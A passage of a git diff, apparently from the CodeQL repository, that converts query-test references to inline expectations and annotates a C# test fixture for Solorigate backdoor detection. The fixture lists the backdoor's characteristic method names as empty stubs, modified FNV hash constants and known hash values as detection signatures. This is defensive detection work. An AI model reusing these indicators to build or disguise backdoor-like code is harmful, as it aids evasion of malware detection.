.../RequireSSL/AddedInForms/RequireSSL.qlref | 3 +- .../HttpCookiesCorrect/RequireSSL.qlref | 2 +- .../RequireSSLMissing/RequireSSL.qlref | 2 +- .../CWE-639/MVCTests/CommentController.cs | 4 +- .../InsecureDirectObjectReference.qlref | 3 +- .../CWE-639/MVCTests/MiscTestControllers.cs | 6 +- .../CWE-639/MVCTests/ProfileController.cs | 2 +- .../CWE-639/WebFormsTests/EditComment.aspx.cs | 2 +- .../InsecureDirectObjectReference.qlref | 3 +- .../HardcodedConnectionString.expected | 6 +- .../CWE-798/HardcodedConnectionString.qlref | 3 +- .../CWE-798/HardcodedCredentials.cs | 18 +- .../CWE-798/HardcodedCredentials.expected | 18 +- .../CWE-798/HardcodedCredentials.qlref | 3 +- .../CWE-798/TestHardcodedCredentials.cs | 2 +- .../LibraryUsage/ExternalLibraryUsage.qlref | 2 +- .../LibraryUsage/SupportedExternalTaint.qlref | 2 +- .../UnsupportedExternalAPIs.qlref | 2 +- .../SupportedExternalApis.qlref | 2 +- .../SupportedExternalSinks.qlref | 2 +- .../SupportedExternalSources.qlref | 2 +- .../UnusedPropertyValue.cs | 6 +- .../UnusedPropertyValue.qlref | 3 +- .../test/query-tests/UseBraces/UseBraces.cs | 10 +- .../query-tests/UseBraces/UseBraces.qlref | 3 +- .../PointlessForwardingMethod.cs | 4 +- .../PointlessForwardingMethod.qlref | 3 +- .../WriteOnlyContainer/WriteOnlyContainer.cs | 68 +-- .../WriteOnlyContainer.qlref | 3 +- .../IncomparableEquals/IncomparableEquals.cs | 6 +- .../IncomparableEquals.qlref | 3 +- .../ObjectComparison/ObjectComparison.cs | 4 +- .../ObjectComparison/ObjectComparison.qlref | 3 +- .../ApplicationModeEndpoints.qlref | 2 +- .../modeleditor/FrameworkModeEndpoints.qlref | 2 +- 373 files changed, 1176 insertions(+), 1036 deletions(-) diff --git a/csharp/ql/campaigns/Solorigate/test/Solorigate/ModifiedFnvFunctionDetection.qlref b/csharp/ql/campaigns/Solorigate/test/Solorigate/ModifiedFnvFunctionDetection.qlref index 0bfdf5905b36..d861fc929b23 100644 --- a/csharp/ql/campaigns/Solorigate/test/Solorigate/ModifiedFnvFunctionDetection.qlref +++ b/csharp/ql/campaigns/Solorigate/test/Solorigate/ModifiedFnvFunctionDetection.qlref @@ -1 +1,2 @@ -ModifiedFnvFunctionDetection.ql +query: ModifiedFnvFunctionDetection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownCommandsAboveThreshold.qlref b/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownCommandsAboveThreshold.qlref index 61c6c1e04a80..6854e44501fe 100644 --- a/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownCommandsAboveThreshold.qlref +++ b/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownCommandsAboveThreshold.qlref @@ -1 +1,2 @@ -NumberOfKnownCommandsAboveThreshold.ql +query: NumberOfKnownCommandsAboveThreshold.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownHashesAboveThreshold.qlref b/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownHashesAboveThreshold.qlref index 718d6c67048c..a66d6d55d198 100644 --- a/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownHashesAboveThreshold.qlref +++ b/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownHashesAboveThreshold.qlref @@ -1 +1,2 @@ -NumberOfKnownHashesAboveThreshold.ql +query: NumberOfKnownHashesAboveThreshold.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownLiteralsAboveThreshold.qlref b/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownLiteralsAboveThreshold.qlref index e17b18d08ae5..38b9897d0685 100644 --- a/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownLiteralsAboveThreshold.qlref +++ b/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownLiteralsAboveThreshold.qlref @@ -1 +1,2 @@ -NumberOfKnownLiteralsAboveThreshold.ql +query: NumberOfKnownLiteralsAboveThreshold.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownMethodNamesAboveThreshold.qlref b/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownMethodNamesAboveThreshold.qlref index 747fb006e437..7f5e000495e2 100644 --- a/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownMethodNamesAboveThreshold.qlref +++ b/csharp/ql/campaigns/Solorigate/test/Solorigate/NumberOfKnownMethodNamesAboveThreshold.qlref @@ -1 +1,2 @@ -NumberOfKnownMethodNamesAboveThreshold.ql +query: NumberOfKnownMethodNamesAboveThreshold.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/campaigns/Solorigate/test/Solorigate/SwallowEverythingExceptionHandler.qlref b/csharp/ql/campaigns/Solorigate/test/Solorigate/SwallowEverythingExceptionHandler.qlref index 538eee55bf20..e49d40d16e12 100644 --- a/csharp/ql/campaigns/Solorigate/test/Solorigate/SwallowEverythingExceptionHandler.qlref +++ b/csharp/ql/campaigns/Solorigate/test/Solorigate/SwallowEverythingExceptionHandler.qlref @@ -1 +1,2 @@ -SwallowEverythingExceptionHandler.ql +query: SwallowEverythingExceptionHandler.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/campaigns/Solorigate/test/Solorigate/test.cs b/csharp/ql/campaigns/Solorigate/test/Solorigate/test.cs index 8680d8346940..cc4ad9eb3556 100644 --- a/csharp/ql/campaigns/Solorigate/test/Solorigate/test.cs +++ b/csharp/ql/campaigns/Solorigate/test/Solorigate/test.cs @@ -6,12 +6,12 @@ class FalsePositiveCases // regular FVN ulong GetRegularFvnHash(string s) { - ulong num = 14695981039346656037UL; /* FNV base offset */ + ulong num = 14695981039346656037UL; /* FNV base offset */ // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] foreach (byte b in Encoding.UTF8.GetBytes(s)) { num ^= (ulong)b; - num *= 1099511628211UL; /* FNV prime */ + num *= 1099511628211UL; /* FNV prime */ // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] } return num; @@ -22,24 +22,24 @@ class TestCases { ulong GetRegularFvnHash(string s) { - ulong num = 14695981039346656037UL; + ulong num = 14695981039346656037UL; // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] try { foreach (byte b in Encoding.UTF8.GetBytes(s)) { num ^= (ulong)b; - num *= 1099511628211UL; + num *= 1099511628211UL; // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] } } catch // BUG : SwallowEverythingExceptionHandler { - } + } // $ Alert[cs/solorigate/swallow-everything-exception] - return num ^ 6605813339339102567UL; // BUG (ModifiedFnvFunctionDetection.ql) + return num ^ 6605813339339102567UL; // BUG (ModifiedFnvFunctionDetection.ql) // $ Alert[cs/solorigate/modified-fnv-function-detection] Alert[cs/solorigate/number-of-known-hashes-above-threshold] } - enum JobEngine + enum JobEngine // $ Alert[cs/solorigate/number-of-known-commands-in-enum-above-threshold] { Idle, Exit, @@ -62,220 +62,220 @@ enum JobEngine None } - void Abort() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void AddFileExecutionEngine() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void AddRegistryExecutionEngine() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void AdjustTokenPrivileges() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Base64Decode() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Base64Encode() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void ByteArrayToHexString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void CheckServerConnection() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Close() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void CloseHandle() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void CollectSystemDescription() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Compress() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void CreateSecureString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void CreateString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void CreateUploadRequest() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void CreateUploadRequestImpl() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Decompress() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void DecryptShort() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Deflate() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void DelayMin() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void DelayMs() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void DeleteFile() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void DeleteRegistryValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void DeleteValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void ExecuteEngine() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void FileExists() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetAddresses() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetAddressFamily() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetArgumentIndex() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetBaseUri() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetBaseUriImpl() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetCache() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetCurrentProcess() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetCurrentString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetDescriptionId() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetFileHash() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetFileSystemEntries() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetHash() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetHive() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetIntArray() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetIPHostEntry() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetManagementObjectProperty() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetNetworkAdapterConfiguration() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetNewOwnerName() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetNextString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetNextStringEx() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetOrCreateUserID() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetOrionImprovementCustomerId() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetOSVersion() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetPreviousString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetProcessByDescription() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetRegistrySubKeyAndValueNames() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetStatus() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetStringHash() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetSubKeyAndValueNames() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetUserAgent() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void GetWebProxy() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void HexStringToByteArray() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Inflate() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Initialize() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void InitiateSystemShutdownExW() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void IsNullOrInvalidName() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void IsSynchronized() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void KillTask() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void LookupPrivilegeValueW() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void OpenProcessToken() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void ParseServiceResponse() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Quote() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void ReadConfig() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void ReadDeviceInfo() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void ReadRegistryValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void ReadReportStatus() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void ReadServiceStatus() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void RebootComputer() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void RunTask() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SearchAssemblies() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SearchConfigurations() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SearchServices() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SetAutomaticMode() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SetKeyOwner() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SetKeyOwnerWithPrivileges() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SetKeyPermissions() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SetManualMode() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SetProcessPrivilege() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SetRegistryValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SetTime() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SetValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void SplitString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void ToString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void TrackEvent() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void TrackProcesses() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Unquote() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Unzip() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Update() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void UpdateBuffer() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void UpdateNotification() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void UploadSystemDescription() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Valid() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void WriteConfig() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void WriteFile() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void WriteReportStatus() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void WriteServiceStatus() { } // BUG : NumberOfKnownMethodNamesAboveThreshold - void Zip() { } // BUG : NumberOfKnownMethodNamesAboveThreshold + void Abort() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void AddFileExecutionEngine() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void AddRegistryExecutionEngine() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void AdjustTokenPrivileges() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Base64Decode() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Base64Encode() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void ByteArrayToHexString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void CheckServerConnection() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Close() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void CloseHandle() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void CollectSystemDescription() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Compress() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void CreateSecureString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void CreateString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void CreateUploadRequest() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void CreateUploadRequestImpl() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Decompress() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void DecryptShort() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Deflate() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void DelayMin() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void DelayMs() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void DeleteFile() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void DeleteRegistryValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void DeleteValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void ExecuteEngine() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void FileExists() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetAddresses() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetAddressFamily() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetArgumentIndex() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetBaseUri() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetBaseUriImpl() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetCache() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetCurrentProcess() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetCurrentString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetDescriptionId() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetFileHash() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetFileSystemEntries() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetHash() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetHive() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetIntArray() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetIPHostEntry() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetManagementObjectProperty() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetNetworkAdapterConfiguration() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetNewOwnerName() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetNextString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetNextStringEx() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetOrCreateUserID() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetOrionImprovementCustomerId() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetOSVersion() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetPreviousString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetProcessByDescription() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetRegistrySubKeyAndValueNames() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetStatus() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetStringHash() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetSubKeyAndValueNames() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetUserAgent() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void GetWebProxy() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void HexStringToByteArray() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Inflate() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Initialize() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void InitiateSystemShutdownExW() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void IsNullOrInvalidName() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void IsSynchronized() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void KillTask() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void LookupPrivilegeValueW() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void OpenProcessToken() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void ParseServiceResponse() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Quote() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void ReadConfig() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void ReadDeviceInfo() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void ReadRegistryValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void ReadReportStatus() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void ReadServiceStatus() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void RebootComputer() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void RunTask() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SearchAssemblies() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SearchConfigurations() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SearchServices() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SetAutomaticMode() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SetKeyOwner() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SetKeyOwnerWithPrivileges() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SetKeyPermissions() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SetManualMode() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SetProcessPrivilege() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SetRegistryValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SetTime() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SetValue() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void SplitString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void ToString() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void TrackEvent() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void TrackProcesses() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Unquote() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Unzip() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Update() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void UpdateBuffer() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void UpdateNotification() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void UploadSystemDescription() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Valid() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void WriteConfig() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void WriteFile() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void WriteReportStatus() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void WriteServiceStatus() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] + void Zip() { } // BUG : NumberOfKnownMethodNamesAboveThreshold // $ Alert[cs/solorigate/number-of-known-method-names-above-threshold] void Hashes() { ulong[] hashes = { // BUG : NumberOfKnownHashesAboveThreshold - 10063651499895178962, 10235971842993272939, 